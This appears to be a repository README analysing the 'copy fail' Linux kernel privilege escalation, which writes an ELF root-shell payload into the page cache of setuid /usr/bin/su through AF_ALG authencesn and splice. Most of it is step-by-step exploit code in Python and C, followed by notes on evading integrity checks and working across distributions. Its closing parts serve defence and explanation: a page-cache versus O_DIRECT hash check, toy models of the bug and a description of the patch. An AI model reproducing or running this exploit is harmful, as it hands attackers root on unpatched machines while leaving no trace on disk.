This repo analyses and documents the copy fail exploit and its patch.

Overwrite the page cache copy of /usr/bin/su with a tiny ELF payload that calls
setuid(0) + execve("/bin/sh"). Since execve() reads from page cache and not
disk, running su after the corruption spawns a root shell. The disk file is never touched.

AF_ALG exposes the kernel crypto subsystem to unprivileged userspace. No root required.

Python:

    a = socket.socket(38, 5, 0)  # 38 = AF_ALG, 5 = SOCK_SEQPACKET

C:

    int alg_fd = socket(38, SOCK_SEQPACKET, 0);

authencesn is an IPsec crypto template that uses the destination
scatterlist as scratch space, which is the root cause of the bug.

Python:

    a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

C:

    struct sockaddr_alg sa = {
        .salg_family = AF_ALG,
        .salg_type = "aead",
        .salg_name = "authencesn(hmac(sha256),cbc(aes))"
    };
    bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));

The key content doesn't matter; the key only needs to be the right length. Authsize = 4 controls the tag region size, which controls where the scratch write lands.

Python:

    setsockopt(SOL_ALG, 1, d('0800010000000010' + '0'*64))  # set key
    setsockopt(SOL_ALG, 5, None, 4)  # authsize = 4 bytes

C:

    uint8_t key[40] = { 0x08,0x00,0x01,0x00,0x00,0x00,0x00,0x10 };
    setsockopt(alg_fd, SOL_ALG, 1, key, sizeof(key));
    setsockopt(alg_fd, SOL_ALG, 5, NULL, 4);

AF_ALG uses a two-socket model:
- binding socket → configure the algorithm
- request socket → send/receive actual data
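
For orientation, the two-socket model can be seen in a harmless setting. The sketch below hashes a message with the kernel's sha256 through AF_ALG. The function name `sha256_via_af_alg` is hypothetical, and the sketch assumes a Linux kernel with the AF_ALG hash interface available.

```python
import socket


def sha256_via_af_alg(data: bytes) -> bytes:
    """Hash data with the kernel's sha256 through AF_ALG (Linux only)."""
    # Binding socket: selects the algorithm type and name.
    with socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0) as algo:
        algo.bind(("hash", "sha256"))
        # Request socket: carries the data for one operation.
        op, _ = algo.accept()
        with op:
            op.sendall(data)
            return op.recv(32)  # a SHA-256 digest is 32 bytes
```

The binding socket never carries data; every operation goes through a request socket obtained from accept().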

Python:

    request_socket, _ = a.accept()

C:

    int req_fd = accept(alg_fd, NULL, NULL);

Open /usr/bin/su read-only. No write permissions needed.
The file descriptor is a handle that leads the kernel to the page cache entries.

Python:

    target = os.open("/usr/bin/su", 0)  # 0 = O_RDONLY

C:

    int target = open("/usr/bin/su", O_RDONLY);

splice requires at least one end to be a pipe, so the pipe is a mandatory intermediary that holds page cache references while they travel to the AF_ALG socket.

Python:

    pipe_r, pipe_w = os.pipe()

C:

    int pipefd[2];
    pipe(pipefd);

Zero-copy transfer: page cache pages of /usr/bin/su are referenced
in the pipe buffer. No data is copied, only pointers to the pages.

Python:

    os.splice(target, pipe_w, offset, offset_src=0)

C:

    int64_t off_src = 0;
    do_splice(f, &off_src, pipefd[1], NULL, offset, SPLICE_F_MOVE);

Page cache references move from the pipe into the AF_ALG TX scatterlist.
Due to the 2017 in-place optimization (req->src = req->dst), those same
pages end up in the writable destination scatterlist.

Python:

    os.splice(pipe_r, request_socket.fileno(), offset)

C:

    do_splice(pipefd[0], NULL, req_fd, NULL, offset, SPLICE_F_MOVE);

Bytes 4-7 of the AAD are seqno_lo, the 4 bytes that will be written into the page cache.
MSG_MORE (32768) tells the kernel to wait for the splice before processing.

Python:

    request_socket.sendmsg(
        [b"A"*4 + payload_chunk],           # AAD: bytes 0-3 filler, bytes 4-7 = value to write
        [(SOL_ALG, 3, b'\x00'*4),           # type 3 = ALG_SET_OP, value 0 = decrypt
         (SOL_ALG, 2, b'\x10'+b'\x00'*19),  # type 2 = ALG_SET_IV: ivlen 16, then 16 zero bytes
         (SOL_ALG, 4, b'\x08'+b'\x00'*3)],  # type 4 = ALG_SET_AEAD_ASSOCLEN, assoclen = 8
        32768                               # MSG_MORE
    )

C:

    sendmsg(req_fd, &msg, 32768);

Calling recv() tells the kernel to run the decrypt operation now.

Python:

    try:
        request_socket.recv(8 + t)
    except:
        pass

C:

    uint8_t recv_buf[8 + t];
    recv(req_fd, recv_buf, sizeof(recv_buf), 0);
    // return value ignored: HMAC failure is expected

11. authencesn reads seqno_hi (bytes 0-3) → b"AAAA" (ignored)
12. authencesn reads seqno_lo (bytes 4-7) → your 4 bytes
13. authencesn writes seqno_lo at dst[assoclen + cryptlen]
→ crosses output boundary into chained page cache pages
→ 4 bytes written into /usr/bin/su page cache ✓
14. HMAC computed → fails (ciphertext was fake)
→ recv() returns error
→ write is NOT rolled back
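
Steps 11-14 can be mimicked with a toy model in plain Python. This is not kernel code: the bytearrays standing in for scatterlist segments and the names `scatter_write` and `toy_decrypt` are hypothetical. The sketch only illustrates how a write at dst[assoclen + cryptlen] falls past the output area into the next chained segment, and why a later authentication failure does not undo it.

```python
def scatter_write(segments, offset, data):
    """Write data at a logical offset across a chain of bytearray segments."""
    for seg in segments:
        if offset >= len(seg):
            offset -= len(seg)  # the write starts in a later segment
            continue
        n = min(len(seg) - offset, len(data))
        seg[offset:offset + n] = data[:n]
        data = data[n:]
        offset = 0
        if not data:
            return
    raise IndexError("write runs past the end of the chain")


def toy_decrypt(dst_segments, aad, assoclen, cryptlen):
    """Toy stand-in for steps 11-14: scratch write, then a failing tag check."""
    seqno_lo = aad[4:8]  # step 12: bytes 4-7 of the AAD
    scatter_write(dst_segments, assoclen + cryptlen, seqno_lo)  # step 13
    raise ValueError("authentication failed")  # step 14: nothing is undone


if __name__ == "__main__":
    out_buf = bytearray(8)         # output area of assoclen + cryptlen bytes
    chained = bytearray(b"." * 8)  # stands in for a chained page cache page
    try:
        toy_decrypt([out_buf, chained], b"AAAAWXYZ", assoclen=8, cryptlen=0)
    except ValueError:
        pass
    print(chained)  # the first 4 bytes now hold the AAD bytes 4-7
```

The exception plays the role of the failing recv(): the caller sees an error, but the bytes written in step 13 stay where they landed.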

The loop advances the offset by 4 on each iteration until the entire ELF payload is written.

Python:

    i = 0
    while i < len(payload):
        write_4bytes(target, i, payload[i:i+4])
        i += 4

C:

    size_t i = 0;
    while (i < total) {
        size_t chunk = (i + 4 <= total) ? 4 : total - i;
        write_4bytes(target, (int)i, buf + i, chunk);
        i += 4;
    }

The kernel loads /usr/bin/su from the page cache, which now contains the payload.
Since su is setuid root, the payload runs as UID 0.

Python:

    os.system("su")

C:

    system("su");

- Page cache write never marks the page dirty → no disk writeback
- On-disk file unchanged → file integrity tools (checksums) see nothing
- recv() returns an error → looks like a failed crypto operation, not an attack
- No new processes, no suspicious files written
- No per-distro offsets or hardcoded addresses
- No kernel version checks
- Works on Ubuntu, RHEL, Amazon Linux, SUSE — any unpatched kernel
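
Because the modification lives only in the page cache, one defensive check is to compare an ordinary buffered read (served from the page cache) with an O_DIRECT read (which bypasses it). The sketch below is a minimal illustration under stated assumptions: the function names are hypothetical, the filesystem must support O_DIRECT (the check returns None otherwise), and a mismatch can have benign causes such as a file being rewritten during the scan.

```python
import hashlib
import mmap
import os

CHUNK = 1 << 20  # 1 MiB: page-aligned and a multiple of common block sizes


def sha256_buffered(path):
    """Hash the file through ordinary reads, which go through the page cache."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def sha256_direct(path):
    """Hash the file through O_DIRECT reads; return None if that is unusable."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    except (OSError, AttributeError):
        return None
    buf = mmap.mmap(-1, CHUNK)  # anonymous mappings are page-aligned
    h = hashlib.sha256()
    try:
        size = os.fstat(fd).st_size
        offset = 0
        while offset < size:
            n = os.preadv(fd, [buf], offset)
            if n == 0:
                break
            h.update(buf[:n])
            offset += n
        return h.hexdigest()
    except OSError:
        return None
    finally:
        buf.close()
        os.close(fd)


def cache_matches_disk(path):
    """True or False when both hashes exist, None when O_DIRECT is unusable."""
    direct = sha256_direct(path)
    if direct is None:
        return None
    return direct == sha256_buffered(path)
```

A result of False for a setuid binary such as /usr/bin/su would be a reason to investigate further, not proof of compromise.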

The patch removes the in-place optimization from algif_aead.c:

    // before: page cache pages reachable through writable dst
    req->src = req->dst

    // after: separate scatterlists, page cache pages stay read-only
    req->src = TX_SGL // page cache pages (read path only)
    req->dst = RX_SGL // user recv buffer (write path)

authencesn's scratch write now lands in the RX buffer (user memory) instead of page cache.
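
The difference between the two assignments comes down to aliasing, which a few lines of plain Python can illustrate. This is a toy model, not kernel code: `run_request` is a hypothetical name, a bytearray stands in for a page, and a fixed 4-byte store stands in for the scratch write.

```python
def run_request(page, in_place):
    """Toy model: return the destination buffer after a 4-byte scratch write."""
    src = page  # TX side: the spliced page
    # in place: dst is the same object as src; otherwise a separate RX buffer
    dst = src if in_place else bytearray(len(src))
    dst[0:4] = b"WXYZ"  # stand-in for the scratch write into dst
    return dst


if __name__ == "__main__":
    before = bytearray(b"." * 8)
    run_request(before, in_place=True)
    print(before)  # the page itself was modified

    after = bytearray(b"." * 8)
    run_request(after, in_place=False)
    print(after)   # the page is untouched; only the RX buffer changed
```

With separate buffers, whatever the algorithm writes into its destination can no longer reach the pages it only needed to read.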